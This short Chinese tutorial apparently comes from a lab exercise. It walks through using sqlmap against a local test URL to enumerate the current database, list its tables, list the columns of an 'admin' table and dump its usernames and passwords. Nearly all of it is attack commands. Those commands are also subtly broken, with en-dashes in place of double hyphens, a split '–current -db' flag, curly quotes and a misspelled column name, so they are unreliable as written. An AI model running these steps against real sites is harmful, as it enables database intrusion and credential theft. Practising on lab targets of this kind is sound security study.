SQLMAP利用方式:
1.先去拿取这个网站的数据库
python sqlmap.py -u “http://127.0.0.1/sqls/?id=2" –current -db –得到当前数据库:sqltext
2.再拿取这个网站数据库的数据表
python sqlmap.py -u “http://127.0.0.1/sqls/?id=2" -D sqltext –tables –得到当前数据库中的数据表:admin、sqltext
3.然后再获取这张数据表中的数据列
python sqlmap.py -u “http://127.0.0.1/sqls/?id=2" -D sqltext -T admin –columns –得到当前数据库中的数据表中的数据列:id、user、pwd
4.最后得到相应的数据
python sqlmap.py -u “http://127.0.0.1/sqls/?id=2" -D sqltext -T admin -C uesr,pwd –dump